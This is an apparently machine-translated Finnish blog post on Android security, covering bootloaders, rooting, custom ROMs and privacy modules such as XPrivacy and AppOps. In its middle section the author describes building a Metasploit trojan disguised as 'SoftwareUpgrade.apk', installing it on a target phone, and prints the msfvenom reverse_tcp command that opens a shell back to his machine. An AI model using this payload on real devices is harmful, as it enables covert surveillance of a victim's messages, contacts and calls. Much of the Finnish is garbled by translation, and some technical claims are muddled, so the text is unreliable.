Kuvan lähde: pixabay.com

Johdanto Androidiin

Tässä aiheesta aiomme oppia Androidista ja avoimen lähdekoodin tietoturvasta (OS). Android on avoimen lähdekoodin alusta. Se on paljon kuin Linux, mutta silti aivan liian erilainen kuin Linux. Linux on aivan liian kypsynyt verrattuna Androidiin. Joten, tämä on Chetan Nayak, ja tervetuloa seuraavaan blogiini avoimen lähdekoodin verkkoturvasta. Olen kirjoittanut tämän blogin olettaen, että suurin osa meistä käyttäisi Android K: ta, ts. Kitkat tai Android L eli Lollipop.

Syynä Gingerbreadiin ja Jellybeaniin oli paljon avoimen lähdekoodin tietoturvaongelmia, joista en voi keskustella tässä yhdessä blogissa. Joten ehkä keskustelen siitä seuraavan kerran, kun asun syvemmälle Androidin vanhempiin versioihin. Joten pidetään kiinni KitKatista ja Lollipopista.

Android suunniteltiin kehittäjien mielessä. Turvallisuustarkastukset on suunniteltu vähentämään kehittäjille aiheutuvaa taakkaa. Tietoturvakykyiset kehittäjät voivat helposti työskennellä joustavien tietoturvakontrollien kanssa ja luottaa niihin. Turvallisuuteen vähemmän perehtyneet kehittäjät suojataan turvallisilla oletusarvoilla.

Alku

En ollut paljon androidissa vasta myöhemmässä vuosineljänneksessä 2013, kun minulla oli ensimmäinen Android-matkapuhelinni, joka oli Sony Xperia L (perustuu 4.2.2 tuolloin). Heck, minä jopa vihasin androidia syystä, että se oli erittäin viivästynyt etenkin Samsung-laitteissa. Ajattelin tuolloin jopa Windows Lumian ostamista, mutta onneksi pelasin paljon pelejä ja jouduin ostamaan Xperia L: n, koska tämä solu oli Lag Proof. Siinä oli noin 1 keikka RAM-muistia ja Adreno 305. Riittävästi viileä suorittaaksesi mitään.

Pelattuaan paljon pelejä, kuten NOVA3 ja ModernCombat4, kyllästyin siihen soluun kuukauden sisällä. Tiesin, että Android perustuu Linuxiin, ja halusin tehdä joitain muutoksista siihen. Aloin lukea räätälöinnistä ja oppin niin kutsuttua "juurtumista". Koska minulla oli hyvä selkäkäyttö Linuxissa, juurtuminen ei ollut minulle ongelma. Pienellä XDA: n avulla pystyin juurruttamaan soluni.

Mutta sitten jotain iski minua. Heti kun soluni käynnistyi uudelleen juurtumisen jälkeen, se aloitti vain käynnistyssilmukan (jumissa käynnistysnäytössä ikuisesti). En edes tiennyt, mikä käynnistyslatausohjelma oli androidissa. Joten mitään ei voinut tehdä. Oli vain kuukausi, kun olin ostanut uuden soluni ja soluni oli nyt pehmeä. Olen aina lukenut, että juurtuminen on vaarallista, mutta en tiennyt, että se murskaisi soluni. Mutta olin väärässä. Lukeessani jatkuvasti kaikkia muita asioita juurtumisen suhteen, sain tietää, että juurtuminen ei haittaa puhelinta.

Juurtuminen on vain samanlainen kuin tietokoneen järjestelmänvalvojan käyttöoikeudet (Itse asiassa se on järjestelmän käyttöoikeus, mutta kirjoitin järjestelmänvalvojan käyttöoikeuden, joten noobsille se on helppo ymmärtää.). Tämä tarkoittaa sitä, että juurtuminen ei koskaan soi puhelimeesi. Se oli bootloader, joka tiivisti puhelimeni. Ihmisille, jotka eivät tiedä käynnistyslatausta, on; bootloader on samanlainen kuin Windowsin BIOS. (Jos et tiedä mikä on BIOS, sinun ei pitäisi edes lukea turvallisuuteen ajattelua.) Bootloader tai Hboot (sitä kutsutaan androidiksi) on ensimmäinen asia, joka käy, kun käynnistät Androidin. laite.

Se pakata ohjeet käyttöjärjestelmän ytimen käynnistämistä varten ja suurin osa niistä on erityisesti suunniteltu ajamaan omaa virheenkorjaus- tai muokkausympäristöä.

Androidin tietoturvapiste

Ajattele käynnistyslatausta laitteen turvallisuuden tarkistuspisteenä. Jos rikot tämän tarkistuspisteen, menetät kaiken, mitä puhelimellasi on. Joten, se on hyvä turvaominaisuus. Koska kadotat puhelimesi ja joku yrittää päästä juuriohjelmaan ohittaaksesi lukituksen (olettaen, että olet lukinnut laitteen nastalla tai salasanalla), hänen on pakollisesti avattava käynnistyslaite, joka johtaa tietojen poistamiseen. puhelimessa.

Joten sinun ei tarvitse huolehtia siitä, että joku käyttää sitä väärin. Joten samanlainen tilanne on mukautettujen ROM-levyjen tapauksessa. ROM-levyt ovat Android-versioihin perustuvia käyttöjärjestelmiä, jotka on erityisesti suunniteltu laitteistoarkkitehtuurillesi. Joten jos tarkistat puhelimesi XDA: lta, sinulla on n lukumäärä räätälöityjä ROM-levyjä puhelimillesi, joista tunnetuimpia ovat syaani Mod-ROM -levyt, jotka ovat jo juurtuneet ja mukana on ennalta määritetty mukautussarja .

Androidin tietoturvan ohitus

Saatat ajatella jo nyt, että sinulla on turvallinen matkapuhelin. Mutta olen täällä todistaaksesi, että olet väärässä jälleen, ja se on tämän blogin koko asia. Vuoden 2014 toiseen vuosineljännekseen mennessä ihmiset olivat jo alkaneet kehittää Android-sovellusten ja rootkit-sovellusten kehittämistä, jotka voisivat juuristaa matkapuhelimesi edes käynnistyslatainten lukituksen.

Etkö ole niin pelottavaa? Annan kertoa sinulle vaarallisimman osan. He voisivat jopa asentaa troijalaisia. Joten vaikka poliisit pystyisivät jäljittämään solun ja saat jopa solun takaisin, on edelleen suuri vaara, että he näkevät kaiken, mitä teet puhelimellasi. Tätä olen kokeillut kokeiluna todellisessa käytännöllisessä ympäristössä.

Käytin Metasploitia tähän hyökkäykseen. Mitä tein, luin troijalaisen ja asensin sen kohdepuhelimeen. Se oli yksinkertainen apk-tiedosto, ja nimitin sille ohjelmistopäivityksen. Joten, jos käyttäjä on vain tavallinen mies, jolla on vain vähän ja tavua tietoturvaa koskevia tietoja, hän ei edes uskalla poistaa sitä. Ja varmistin, että aina kun Internet aktivoidaan, luomani haittaohjelma suorittaa itsensä automaattisesti ja muodostaa yhteyden isäntäkoneen etäporttiin.

Seuraavia komentoja käytettiin hyökkäyksessä (Metasploit on tunkeutumisen testausohjelmisto, joka auttaa tarkistamaan alustan tai tiettyjen laitteiden haavoittuvuuksia.)

Isäntä IP-osoitteeni: 192.168.xx.xx

Isäntäportti (yhteyden muodostamiseksi takaisin): 445

>>>msfvenom

>>> msfvenom android / meterpreter / reverse_tcp LHOST = 192.168.xx.xx LPORT = 445> SoftwareUpgrade.apk

Joten, tässä loin käännetyn TCP-kanavan tietokoneelleni. Joten joka kerta, kun Internet käynnistyy androidissa, saan kuoren, joka avataan Kali-koneelleni tai koneelle, johon olen asentanut Metasploitin.

Joten, nyt tiedät kuinka pelottava on henkilölle, jota et edes tiedä, sillä on tietueet jokaisesta solun kautta tekemästäsi tapahtumasta, kaikista muista yhteyshenkilöistä, WhatsApp-viesteistä, tekstiviesteistä, Viberistä ja Skypen puhelulokista ja kaikesta. Jos se ei ole pelottavaa, en tiedä mikä on.

Suositellut kurssit

  • Sertifiointikurssi Rubyn virheenkorjauksessa
  • Täydellinen PHP MySQL-kurssi
  • VB.NET-ohjelmoinnin verkkosertifiointikurssi
  • Online-kurssi ITIL-säätiöstä

Kattavuus

Tarpeeksi turvallisuuskysymyksiin. Me kaikki tiedämme, että jokaisella muulla alustalla on tietoturvaongelmia. Kuinka voimme sitten olla turvassa? Tämä ei ole totta. Alustoista voidaan tehdä turvallinen tiettyyn pisteeseen saakka, mutta sen jälkeen meidän on jopa varmistettava, että ne pysyvät sellaisina. Turvallisuusmaailmassa on surullista lainaus:

"Sosiaalinen tekniikka: Koska ihmisen tyhmyydelle ei ole korjausta"

Kuulin tämän lauseen kauan sitten, kun katselin DefCon-konferenssia.

Kun käyttöä varten ei ole teknistä haavoittuvuutta, sinun tulisi yrittää hakkeroida ihmisiä. Eikä tällä tarkoita hypnoottisuutta ja muuta. Tarkoitan sosiaalista tekniikkaa. Voit lukea tästä lisää blogini “Kyberturvallisuuden merkitys päivittäisessä elämässämme”.

Androidin ydinturvatoiminto

Lisäksi sosiaalinen tekniikka, josta voi huolehtia vain jos olet älykäs; on olemassa tapoja, joilla voit kehittää android-sovelluksia turvallisella tavalla varmistaaksesi, että se pysyy sellaisena.

Joten tässä on joitain tärkeimmistä tietoturvaominaisuuksista, jotka auttavat rakentamaan suojattuja sovelluksia:

  • Android-sovelluksen hiekkalaatikko, joka erottaa sovellustietosi ja koodin suorittamisen muista sovelluksista.
  • Sovelluskehys, jolla on vankat tietoturvatoimintojen, kuten salauksen, käyttöoikeuksien ja suojatun IPC: n, toteutukset.
  • Salattu tiedostojärjestelmä, joka voidaan ottaa käyttöön kadonneiden tai varastettujen laitteiden tietojen suojaamiseksi.
  • Käyttäjän myöntämät luvat rajoittaa pääsyä järjestelmän ominaisuuksiin ja käyttäjätietoihin.
  • Sovelluksen määrittämät käyttöoikeudet sovellustietojen hallitsemiseksi sovelluskohtaisesti.

Mitä voit tehdä, jos haluat turvallisen ympäristön, mutta et ole kehittäjä?

Android 5 -käyttöjärjestelmästä (Lollipop) alkaen se tarjoaa ominaisuuden, jossa käyttäjä voi lisätä useita profiileja ja rajoitettuja tiloja puhelimien ja tablettien käyttämiseen. Lisäksi, jos olet juurtunut puhelimeesi, Xposed-moduuleissa on android-sovelluksia, kuten AppOps, Xprivacy tai Privacy Guard, jotka voivat auttaa sinua huolehtimaan melkein kaikesta. Sinun on asennettava Xposed-kehys tätä varten.

Xposed-kehys antaa Xposed-moduulien toimia. Xposed-moduulien avulla voit muuttaa Apk-tiedostojen ja järjestelmätiedostojen käyttäytymistä tarvitsematta asentaa toista ROM-levyä. Se on myös helppo peruuttaa muutokset, joten tässä on vähän vaaraa eikä se ole edes aikaa vievää, koska useita ROM-levyjä, ytimiä ja niiden virhekorjauksia ei tarvitse välittää.

Xprivacy, Privacy Guard ja AppOps ovat paljastuneita moduuleja, joiden avulla voit tehdä Android-laitteistasi suojattuja valitsemalla millä sovelluksella pitäisi olla pääsy mihin tahansa, kuten Internet, näppäimistö, SD-kortti, pääkäyttäjän käyttöoikeus ja paljon muuta. Voit jopa estää pääsyn vain tiettyihin palveluihin ja luoda siihen käyttäjän määrittelemiä malleja. Minusta on parempi valita Xprivacy. Mutta tässä on joitain tietoja tai eroja, jos pyydät eroon valitaksesi kolmen edellä mainitun välillä.

AppOps:

Google otti tämän käyttöön alun perin Android 4.3: ssa. (Tämä on pääasiallinen syy siihen, etten tue sitä. En luota Googleen. Kutsu sitä Paranoiaksi, mutta google jäljittää kaiken, mitä teet. Ja en tarvitse jokua seurata kaikkea mitä teen, mutta jos luotat Googleen, Anna palaa.). AppOpsin päärajoitus on, että Google sallii estää pääsyn vain niihin sovelluksiin, jotka se haluaa sinun estävän.

Tämä tarkoittaa, jos haluat estää Googleen liittyviä sovelluksia, kuten Play-palvelut (jotka tosiasiallisesti kuluttavat yli 50% normaalista muistista, akusta ja tiedoista (Internet)) et pysty. Tämä on vielä yksi syy vihata Googlea. Joten uskon, että AppOps on vain haittaohjelma minulle. (mutta minä vain ajattelen tällä tavalla, et ole, jos luotat vain sydämellisesti Googleen)

Yksityisyyden suoja:

Privacy Guard on yksinkertainen käyttöliittymä, joka on valmistettu syaanimodin Modin AppOps-tilalle. Jos olet aloittelija, suosittelen, että käytät tätä, koska siinä on vain kytkentäpainike ja itse määritetyt mallit siitä, millaisilla sovelluksilla pitäisi olla pääsy mihin. Tämä ei ole niin turvallinen, jos on haittaohjelma, joka toimii tai esiintyy kuin järjestelmäsovellus. Mutta on hyvä aloittaa aloittaminen.

Xprivacy:

Xprivacy on kaikki yhdessä työkalu. Mutta se on tarkoitettu asiantuntijoille. Voit verrata sitä Sveitsin armeijan veitsiin. Siinä on kaikki siinä olevat ja se voi tehdä puhelimesi turvallisena kaikilla muilla tavoilla, mutta jos et tiedä mitä teet, se vain hämmentää puhelinta ja estää sovelluksia edes käynnistämästä. Voit myös rajoittaa pääsyä järjestelmän sovelluksiin. Tätä mieluummin valitsen.

Yllä olevien moduulien lisäksi Xposedissä on myös muita moduuleja, kuten Lightening Firewall tai BootManager, jotka voivat auttaa rajoittamaan tiettyjen sovellusten pääsyä Internetiin ja estämään sovelluksia käynnistymästä järjestelmän rinnalla, kun käynnistät puhelimen uudelleen.

Joten, se olisi se tämän blogin. Turvallisuusongelmien vuoksi voit varmasti käydä XDA-sivustossa tai olla sen jäsen, joka voi antaa sinulle paljon lisätietoja yksityisyydestä.

Suositellut artikkelit: -

Tämä on ollut opas Androidille. Tässä keskustelimme Androidin peruskonseptista, turvallisuuden tarkistuspisteistä ja ydinturvatoiminnosta. Voit myös käydä läpi muiden ehdotettujen artikkeleidemme saadaksesi lisätietoja -

  1. Android-haastattelukysymykset - 10 suosituinta hyödyllistä kysymystä
  2. 8 hyödyllistä Siri-vaihtoehtoa Androidille
  3. 28 parasta vinkkiä ja vinkkejä Android-sovellusten kehittämistyökaluille
  4. Ura Android-kehityksessä

Luokka:

Ohjelmistokehitys